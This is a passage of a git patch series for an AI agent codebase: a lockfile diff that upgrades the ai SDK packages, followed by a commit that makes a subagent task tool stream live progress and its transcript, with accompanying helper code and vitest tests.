     resolution: {integrity: sha512-nhCBV3quEgesuf7c7KYfperqSS14T8bYuvJ8PcLJp6znkZpFc0AuW4qBtr8eKVyPPe/8RSr7sglCWPU5eaxwKQ==}
 
-  '@ai-sdk/anthropic@3.0.13':
-    resolution: {integrity: sha512-62UqSpZWuR8pU2ZLc1IgPYiNdH01blAcaNEjrQtx4wCN7L2fUTXm/iG6Tq9qRCiRED+8eQ43olggbf0fbguqkA==}
+  '@ai-sdk/anthropic@3.0.78':
+    resolution: {integrity: sha512-0OY12G20cUt6iU6htpEA1491Oz++NVxZxlmWGX4B7rSbeZ5pnDmOu6YtW9BKzdZlNx5Gn23i6WMxyZFoMKNcgA==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/gateway@2.0.0-beta.66':
-    resolution: {integrity: sha512-9H4Y4pFcTlDqLOjhJNfHVJrmQiGGqzQLIDNKSGhab90KYgeZc7NouQF752jUIlEZCY1S4QynuUKISTUsKR6Qjg==}
+  '@ai-sdk/gateway@3.0.119':
+    resolution: {integrity: sha512-VAhfRWC+JexZakkVfmjaJKaTj00x7/UHdE8kMWL3NhuQAlf8oXtg9r4dfvFZrByXxchGRBvYE3biEUyibkg0xg==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/gateway@2.0.83':
-    resolution: {integrity: sha512-qgxu2++9tJTPZtC+VGczu21YNXTtzfrLQunqh7xcCaWSogAluchrGiKFS3IZkX7Se9dEt1yYZ6+d+cGo4cko6Q==}
+  '@ai-sdk/google@3.0.79':
+    resolution: {integrity: sha512-QWVAvYeA7JzEX2wkSyXOWv/I9PD9kvTzdykkSTLi+Eu8RyJ6gA0tdPIGa8esEtOcHE//G5vy6FTB70qQw8l/uw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/google@3.0.8':
-    resolution: {integrity: sha512-HiDetkn01f8ibcu6atygkPXsy6YgNA2uNz2bwgn6xHQQB1FsCCjDo8ylPA2EvaUbNypmD7oPj0zObDgwfE25Ug==}
+  '@ai-sdk/mcp@1.0.43':
+    resolution: {integrity: sha512-HdDMeyCcfIn5tW/P1kJ+BmYP8vfY8vppRn7swbVNRcLeFz/cpwik+B+C49Up4u5scRAcATtRJywOa7/rA4BmIA==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/mcp@0.0.12':
-    resolution: {integrity: sha512-hyf31U2CmgGexqOLgLfno525pjbqidJLu9pU+XcEwW/PkMcfTFuRq1iD3wbqtAmURRW0qJITiKV+in1B4I23gA==}
+  '@ai-sdk/openai@3.0.65':
+    resolution: {integrity: sha512-ZlVoWH+zrdiYDiUt6n/xvfCsk33mzsB81TUQkBRVx79rxU1FKZqVH9J/QCtEpSLqx0cUzjvtIw9l9p7EbUv+dw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/openai@3.0.10':
-    resolution: {integrity: sha512-G6HJORN0rKuCFrqIUiYchjl2b4UjzKvv3VcNuW7xwQIdI8EcdB9Pr8ZaR9nEImK9E639nM8gCfvFEUM1xwGaCA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@3.0.19':
-    resolution: {integrity: sha512-W41Wc9/jbUVXVwCN/7bWa4IKe8MtxO3EyA0Hfhx6grnmiYlCvpI8neSYWFE0zScXJkgA/YK3BRybzgyiXuu6JA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@3.0.24':
-    resolution: {integrity: sha512-Zq6olgYvpMgfstQNpDwgqDC2wBEE+OnMnMuq4JyIu+aWjL8JJl+6u1sbKJNPxASErWrRlmOPIkat2fHiN4puhA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@4.0.0-beta.38':
-    resolution: {integrity: sha512-m1klVKT8KntgEIxHnSGEzdhdn48Uf/w6fe5rPWGnpTd+P532mADV7BC4txNYp40ziS5Z9VV1g1wn2xRScwEeRw==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      '@valibot/to-json-schema': ^1.3.0
-      arktype: ^2.1.22
-      effect: ^3.18.4
-      zod: ^3.25.76 || ^4.1.8
-    peerDependenciesMeta:
-      '@valibot/to-json-schema':
-        optional: true
-      arktype:
-        optional: true
-      effect:
-        optional: true
-
-  '@ai-sdk/provider-utils@4.0.6':
-    resolution: {integrity: sha512-o/SP1GQOrpXAzHjMosPHI0Pu+YkwxIMndSjSLrEXtcVixdrjqrGaA9I7xJcWf+XpRFJ9byPHrKYnprwS+36gMg==}
+  '@ai-sdk/provider-utils@4.0.27':
+    resolution: {integrity: sha512-ubkAJ+xODouwtmN1tYlvTPphH1hPOBfZaEQe8U7skGvFAnIRs9PPpsq57bC2+Ky/MB4yzhd6YOsxTAx9sGpazw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -278,20 +244,8 @@ packages:
     resolution: {integrity: sha512-qZMxYJ0qqX/RfnuIaab+zp8UAeJn/ygXXAffR5I4N0n1IrvA6qBsjc8hXLmBiMV2zoXlifkacF7sEFnYnjBcqg==}
     engines: {node: '>=18'}
 
-  '@ai-sdk/provider@2.0.0':
-    resolution: {integrity: sha512-6o7Y2SeO9vFKB8lArHXehNuusnpddKPk7xqL7T2/b+OvXMRIXUO1rR4wcv1hAFUAT9avGZshty3Wlua/XA7TvA==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@2.0.2':
-    resolution: {integrity: sha512-Epf0oKdUxNRK97Qm4l/Sp05TnwzE8FsyRF5p6nncOp8zH0GTuwK2uZoyzE/3uVjRdZNLyQ6Jw/SBjlOScMQy1Q==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@3.0.0-beta.20':
-    resolution: {integrity: sha512-+JqXbqHHtucRsMFGidygRyftpjX1GD2r4cG3Sh2URZ6g8IaN8k4loXNh2gX92dd4YjlYYn3eTHp3R8dDJfX25Q==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@3.0.3':
-    resolution: {integrity: sha512-qGPYdoAuECaUXPrrz0BPX1SacZQuJ6zky0aakxpW89QW1hrY0eF4gcFm/3L9Pk8C5Fwe+RvBf2z7ZjDhaPjnlg==}
+  '@ai-sdk/provider@3.0.10':
+    resolution: {integrity: sha512-Q3BZ27qfpYqnCYGvE3vt+Qi6LGOF9R5Nmzn+9JoM1lCRsD9mYaIhfJLkSunN48nfGXJ6n+XNV0J/XVpqGQl7Dw==}
     engines: {node: '>=18'}
 
   '@alloc/quick-lru@5.2.0':
@@ -3252,14 +3206,6 @@ packages:
       '@aws-sdk/credential-provider-web-identity':
         optional: true
 
-  '@vercel/oidc@3.0.5':
-    resolution: {integrity: sha512-fnYhv671l+eTTp48gB4zEsTW/YtRgRPnkI2nT7x6qw5rkI1Lq2hTmQIpHPgyThI0znLK+vX2n9XxKdXZ7BUbbw==}
-    engines: {node: '>= 20'}
-
-  '@vercel/oidc@3.1.0':
-    resolution: {integrity: sha512-Fw28YZpRnA3cAHHDlkt7xQHiJ0fcL+NRcIqsocZQUSmbzeIKRpwttJjik5ZGanXP+vlA4SbTg+AbA3bP363l+w==}
-    engines: {node: '>= 20'}
-
   '@vercel/oidc@3.2.0':
     resolution: {integrity: sha512-UycprH3T6n3jH0k44NHMa7pnFHGu/N05MjojYr+Mc6I7obkoLIJujSWwin1pCvdy/eOxrI/l3uDLQsmcrOb4ug==}
     engines: {node: '>= 20'}
@@ -3647,8 +3593,8 @@ packages:
     resolution: {integrity: sha512-kja8j7PjmncONqaTsB8fQ+wE2mSU2DJ9D4XKoJ5PFWIdRMa6SLSN1ff4mOr4jCbfRSsxR4keIiySJU0N9T5hIQ==}
     engines: {node: '>= 8.0.0'}
 
-  ai@6.0.0-beta.122:
-    resolution: {integrity: sha512-Lk8hWSX22eyJBwZvIRY+Bgl8piVB9Jadqv+ine0B2lDJWPg3lsmQac3kSAzGhPBeNeaxm22sHCs9JhuJh3gW5Q==}
+  ai@6.0.190:
+    resolution: {integrity: sha512-T+ixHbWZ6jmHRREpVVJTkFyWJeCekCdzLPan7lp1F32jG5OUw4+odlVYjtMRXVzogU+pWzpMmXdRiHUmdL/q0w==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -4834,6 +4780,10 @@ packages:
     resolution: {integrity: sha512-Vo1ab+QXPzZ4tCa8SwIHJFaSzy4R6SHf7BY79rFBDf0idraZWAkYrDjDj8uWaSm3S2TK+hJ7/t1CEmZ7jXw+pg==}
     engines: {node: '>=18.0.0'}
 
+  eventsource-parser@3.0.8:
+    resolution: {integrity: sha512-70QWGkr4snxr0OXLRWsFLeRBIRPuQOvt4s8QYjmUlmlkyTZkRqS7EDVRZtzU3TiyDbXSzaOeF0XUKy8PchzukQ==}
+    engines: {node: '>=18.0.0'}
+
   eventsource@3.0.7:
     resolution: {integrity: sha512-CRT1WTyuQoD771GW56XEZFQ/ZoSfWid1alKGDYMmkt2yl8UXrVR4pspqWNEcqKvVIzg6PAltWjxcSSPrboA4iA==}
     engines: {node: '>=18.0.0'}
@@ -8173,94 +8123,50 @@ snapshots:
 
   '@adraffy/ens-normalize@1.11.1': {}
 
-  '@ai-sdk/anthropic@3.0.13(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
-      zod: 4.1.13
-
-  '@ai-sdk/gateway@2.0.0-beta.66(zod@4.1.13)':
+  '@ai-sdk/anthropic@3.0.78(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13)
-      '@vercel/oidc': 3.0.5
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
-    transitivePeerDependencies:
-      - '@valibot/to-json-schema'
-      - arktype
-      - effect
 
-  '@ai-sdk/gateway@2.0.83(zod@4.1.13)':
+  '@ai-sdk/gateway@3.0.119(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 2.0.2
-      '@ai-sdk/provider-utils': 3.0.24(zod@4.1.13)
-      '@vercel/oidc': 3.1.0
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
+      '@vercel/oidc': 3.2.0
       zod: 4.1.13
 
-  '@ai-sdk/google@3.0.8(zod@4.1.13)':
+  '@ai-sdk/google@3.0.79(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
 
-  '@ai-sdk/mcp@0.0.12(zod@4.1.13)':
+  '@ai-sdk/mcp@1.0.43(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 2.0.0
-      '@ai-sdk/provider-utils': 3.0.19(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       pkce-challenge: 5.0.1
       zod: 4.1.13
 
-  '@ai-sdk/openai@3.0.10(zod@4.1.13)':
+  '@ai-sdk/openai@3.0.65(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@3.0.19(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 2.0.0
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@3.0.24(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 2.0.2
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@4.0.0-beta.38(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
 
-  '@ai-sdk/provider-utils@4.0.6(zod@4.1.13)':
+  '@ai-sdk/provider-utils@4.0.27(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
+      '@ai-sdk/provider': 3.0.10
       '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
+      eventsource-parser: 3.0.8
       zod: 4.1.13
 
   '@ai-sdk/provider@1.1.3':
     dependencies:
       json-schema: 0.4.0
 
-  '@ai-sdk/provider@2.0.0':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@2.0.2':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@3.0.0-beta.20':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@3.0.3':
+  '@ai-sdk/provider@3.0.10':
     dependencies:
       json-schema: 0.4.0
 
@@ -8716,10 +8622,10 @@ snapshots:
     dependencies:
       zod: 4.1.13
 
-  '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))':
+  '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))':
     dependencies:
       '@composio/core': 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13)
-      ai: 6.0.0-beta.122(zod@4.1.13)
+      ai: 6.0.190(zod@4.1.13)
 
   '@crawlee/types@3.15.3':
     dependencies:
@@ -11704,7 +11610,7 @@ snapshots:
       - supports-color
       - utf-8-validate
 
-  '@trigger.dev/sdk@4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)':
+  '@trigger.dev/sdk@4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)':
     dependencies:
       '@opentelemetry/api': 1.9.0
       '@opentelemetry/semantic-conventions': 1.36.0
@@ -11720,7 +11626,7 @@ snapshots:
       ws: 8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10)
       zod: 4.1.13
     optionalDependencies:
-      ai: 6.0.0-beta.122(zod@4.1.13)
+      ai: 6.0.190(zod@4.1.13)
     transitivePeerDependencies:
       - bufferutil
       - supports-color
@@ -11989,17 +11895,13 @@ snapshots:
     optionalDependencies:
       '@aws-sdk/credential-provider-web-identity': 3.972.13
 
-  '@vercel/oidc@3.0.5': {}
-
-  '@vercel/oidc@3.1.0': {}
-
   '@vercel/oidc@3.2.0': {}
 
   '@vercel/oidc@3.4.0': {}
 
   '@vercel/queue@0.1.4':
     dependencies:
-      '@vercel/oidc': 3.2.0
+      '@vercel/oidc': 3.4.0
       minimatch: 10.2.5
       mixpart: 0.0.5
       picocolors: 1.1.1
@@ -13093,17 +12995,13 @@ snapshots:
     dependencies:
       humanize-ms: 1.2.1
 
-  ai@6.0.0-beta.122(zod@4.1.13):
+  ai@6.0.190(zod@4.1.13):
     dependencies:
-      '@ai-sdk/gateway': 2.0.0-beta.66(zod@4.1.13)
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13)
+      '@ai-sdk/gateway': 3.0.119(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       '@opentelemetry/api': 1.9.0
       zod: 4.1.13
-    transitivePeerDependencies:
-      - '@valibot/to-json-schema'
-      - arktype
-      - effect
 
   ajv-formats@3.0.1(ajv@8.17.1):
     optionalDependencies:
@@ -14589,6 +14487,8 @@ snapshots:
 
   eventsource-parser@3.0.6: {}
 
+  eventsource-parser@3.0.8: {}
+
   eventsource@3.0.7:
     dependencies:
       eventsource-parser: 3.0.6

From 386c4ee232107b75665e24377aad108b674e440a Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 19:20:20 -0500
Subject: [PATCH 08/10] feat(task-tool): live subagent progress + transcript
 (Cutover Bundle B) (#594)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../__tests__/sumLanguageModelUsage.test.ts   |  27 ++
 .../messageMetadata/sumLanguageModelUsage.ts  |  21 ++
 .../__tests__/askUserQuestionTool.test.ts     |  14 +-
 lib/agent/tools/__tests__/taskTool.test.ts    | 273 ++++++++++++------
 lib/agent/tools/askUserQuestionTool.ts        |   2 +-
 lib/agent/tools/taskTool.ts                   | 155 ++++++----
 6 files changed, 343 insertions(+), 149 deletions(-)
 create mode 100644 lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
 create mode 100644 lib/agent/messageMetadata/sumLanguageModelUsage.ts

diff --git a/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
new file mode 100644
index 000000000..403bbe5ab
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
@@ -0,0 +1,27 @@
+import { describe, it, expect } from "vitest";
+import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage";
+
+describe("sumLanguageModelUsage", () => {
+  it("returns undefined when both inputs are undefined", () => {
+    expect(sumLanguageModelUsage(undefined, undefined)).toBeUndefined();
+  });
+
+  it("returns the second input when first is undefined", () => {
+    const u = { inputTokens: 100, outputTokens: 50 };
+    expect(sumLanguageModelUsage(undefined, u as never)).toBe(u);
+  });
+
+  it("returns the first input when second is undefined", () => {
+    const u = { inputTokens: 100, outputTokens: 50 };
+    expect(sumLanguageModelUsage(u as never, undefined)).toBe(u);
+  });
+
+  it("sums the two inputs pointwise when both are present", () => {
+    const result = sumLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50 } as never,
+      { inputTokens: 200, outputTokens: 75 } as never,
+    );
+    expect(result?.inputTokens).toBe(300);
+    expect(result?.outputTokens).toBe(125);
+  });
+});
diff --git a/lib/agent/messageMetadata/sumLanguageModelUsage.ts b/lib/agent/messageMetadata/sumLanguageModelUsage.ts
new file mode 100644
index 000000000..2f400f33b
--- /dev/null
+++ b/lib/agent/messageMetadata/sumLanguageModelUsage.ts
@@ -0,0 +1,21 @@
+import type { LanguageModelUsage } from "ai";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+
+/**
+ * Sum two optional `LanguageModelUsage` records. Returns the pointwise
+ * sum when both are defined, the defined one (same reference, not a
+ * copy) when only one is, or `undefined` when neither is. Mirrors
+ * open-agents' `sumLanguageModelUsage` in `packages/agent/usage.ts`.
+ *
+ * Used by the `task` tool's progress streaming to accumulate usage
+ * across subagent steps without introducing zero-tokens placeholders
+ * before the first step finishes.
+ */
+export function sumLanguageModelUsage(
+  a: LanguageModelUsage | undefined,
+  b: LanguageModelUsage | undefined,
+): LanguageModelUsage | undefined {
+  if (!a) return b;
+  if (!b) return a;
+  return addLanguageModelUsage(a, b);
+}
diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
index ee55e6305..79995551a 100644
--- a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
+++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
@@ -81,14 +81,16 @@ describe("askUserQuestionTool — server-side wiring", () => {
 
 describe("askUserQuestionTool.toModelOutput", () => {
   it("returns a generic message when no output is present", () => {
-    expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({
+    expect(askUserQuestionTool.toModelOutput!({ output: undefined } as never)).toEqual({
       type: "text",
       value: "User did not respond to questions.",
     });
   });
 
   it("formats `declined: true` as a clear decline message", () => {
-    const result = askUserQuestionTool.toModelOutput!({ declined: true } as never);
+    const result = askUserQuestionTool.toModelOutput!({
+      output: { declined: true },
+    } as never);
     expect(result).toMatchObject({
       type: "text",
       value: expect.stringMatching(/declined to answer/i),
@@ -97,9 +99,11 @@ describe("askUserQuestionTool.toModelOutput", () => {
 
   it("formats answered questions as a parseable Q=A summary", () => {
     const result = askUserQuestionTool.toModelOutput!({
-      answers: {
-        "Which model do you want?": "Haiku",
-        "Which features?": ["Streaming", "Tools"],
+      output: {
+        answers: {
+          "Which model do you want?": "Haiku",
+          "Which features?": ["Streaming", "Tools"],
+        },
       },
     } as never);
     expect(result).toMatchObject({
diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts
index 609037918..8e876afdb 100644
--- a/lib/agent/tools/__tests__/taskTool.test.ts
+++ b/lib/agent/tools/__tests__/taskTool.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, vi, beforeEach } from "vitest";
-import { taskTool } from "@/lib/agent/tools/taskTool";
+import { taskTool, type TaskToolOutput } from "@/lib/agent/tools/taskTool";
 import { streamText } from "ai";
 import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
 
@@ -12,79 +12,176 @@ vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
   connectVercel: vi.fn(),
 }));
 
-// `model` is normally attached by `runAgentStep` before the subagent
-// sees the context. The opaque sentinel below is enough for taskTool
-// to pass it into `streamText` — we assert the same instance flows
-// through.
-const mainModel = { __sentinel: "main-model" } as never;
-const subagentModelOverride = { __sentinel: "subagent-model" } as never;
+const mainModel = { modelId: "anthropic/claude-haiku-4.5" } as never;
+const subagentModelOverride = { modelId: "anthropic/claude-sonnet-4.6" } as never;
 const ctx = {
   sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
   model: mainModel,
 };
 
-function makeStreamTextResult(finalText: string) {
+function makeStreamResult(opts: {
+  toolCalls?: Array<{ toolName: string; input: unknown }>;
+  finishSteps?: number;
+  responseMessages?: Array<{ role: string; content: unknown }>;
+  totalUsage?: unknown;
+}) {
+  const calls = opts.toolCalls ?? [];
+  const finishCount = opts.finishSteps ?? 1;
   return {
     fullStream: (async function* () {
-      // empty — execute only awaits `result.finishReason` + result.response
+      for (const c of calls) {
+        yield { type: "tool-call", toolName: c.toolName, input: c.input };
+      }
+      for (let i = 0; i < finishCount; i++) {
+        yield {
+          type: "finish-step",
+          usage: { inputTokens: 100, outputTokens: 25, totalTokens: 125 },
+        };
+      }
     })(),
+    response: Promise.resolve({ messages: opts.responseMessages ?? [] }),
+    totalUsage: Promise.resolve(opts.totalUsage ?? { inputTokens: 0, outputTokens: 0 }),
     finishReason: Promise.resolve("stop"),
-    response: Promise.resolve({
-      messages: [
-        {
-          role: "assistant",
-          content: [{ type: "text", text: finalText }],
-        },
-      ],
-    }),
   };
 }
 
+async function drainGenerator<T>(gen: AsyncGenerator<T> | AsyncIterable<T>): Promise<T[]> {
+  const out: T[] = [];
+  for await (const chunk of gen) out.push(chunk);
+  return out;
+}
+
 beforeEach(() => {
   vi.clearAllMocks();
   vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never);
 });
 
-describe("taskTool.execute", () => {
-  it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never);
-    const result = (await taskTool.execute!(
-      { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" },
-      { experimental_context: ctx } as never,
-    )) as { success: boolean; summary: string };
-    expect(result.success).toBe(true);
-    expect(result.summary).toBe("Task done.");
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record<string, unknown>;
-    // system prompt contains task + instructions so the subagent knows its scope
-    expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file"));
-    expect(args.system).toEqual(expect.stringContaining("Use glob and stat"));
+describe("taskTool.execute (async generator)", () => {
+  it("yields an initial chunk with toolCallCount=0 + startedAt + modelId before the subagent does any work", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    const gen = taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never) as AsyncGenerator<TaskToolOutput>;
+    const first = await gen.next();
+    expect(first.done).toBe(false);
+    expect(first.value).toMatchObject({
+      toolCallCount: 0,
+      modelId: "anthropic/claude-haiku-4.5",
+    });
+    expect(first.value.startedAt).toBeTypeOf("number");
+    // Drain to finish.
+    await drainGenerator(gen);
   });
 
-  it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
+  it("emits a `pending` chunk with name + input on every tool-call", async () => {
+    vi.mocked(streamText).mockReturnValue(
+      makeStreamResult({
+        toolCalls: [
+          { toolName: "bash", input: { command: "ls" } },
+          { toolName: "read", input: { path: "/foo" } },
+        ],
+        finishSteps: 1,
+        responseMessages: [{ role: "assistant", content: [{ type: "text", text: "done" }] }],
+      }) as never,
+    );
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    // Two tool-call yields + one finish-step yield (sticky pending so the
+    // UI doesn't flicker back to an initializing state between steps).
+    const pendingChunks = chunks.filter(c => c.pending);
+    expect(pendingChunks).toHaveLength(3);
+    expect(pendingChunks[0]?.pending).toEqual({ name: "bash", input: { command: "ls" } });
+    expect(pendingChunks[0]?.toolCallCount).toBe(1);
+    expect(pendingChunks[1]?.pending).toEqual({ name: "read", input: { path: "/foo" } });
+    expect(pendingChunks[1]?.toolCallCount).toBe(2);
+    // Finish-step keeps the most recent pending sticky.
+    expect(pendingChunks[2]?.pending).toEqual({ name: "read", input: { path: "/foo" } });
+  });
+
+  it("accumulates usage across finish-step parts", async () => {
+    vi.mocked(streamText).mockReturnValue(
+      makeStreamResult({
+        finishSteps: 2,
+        responseMessages: [{ role: "assistant", content: [{ type: "text", text: "ok" }] }],
+      }) as never,
+    );
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    const usageChunks = chunks.filter(c => c.usage);
+    // Expect 3 usage chunks (2 finish-step + 1 final); assert at least the 2 finish-step ones.
+    expect(usageChunks.length).toBeGreaterThanOrEqual(2);
+    const last = usageChunks[usageChunks.length - 1]!;
+    expect(last.usage).toMatchObject({ inputTokens: 200, outputTokens: 50 });
+  });
+
+  it("emits a final chunk containing the subagent's full response.messages transcript", async () => {
+    const responseMessages = [
+      { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] },
+      { role: "tool", content: [{ type: "tool-result", output: "..." }] },
+      { role: "assistant", content: [{ type: "text", text: "Done." }] },
+    ];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ responseMessages }) as never);
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    const finalChunk = chunks.find(c => c.final);
+    expect(finalChunk).toBeDefined();
+    expect(finalChunk!.final).toEqual(responseMessages);
+    expect(finalChunk!.toolCallCount).toBe(0);
+    expect(finalChunk!.usage).toBeDefined();
+  });
+
+  it("uses the subagentModel override when set on the agent context", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
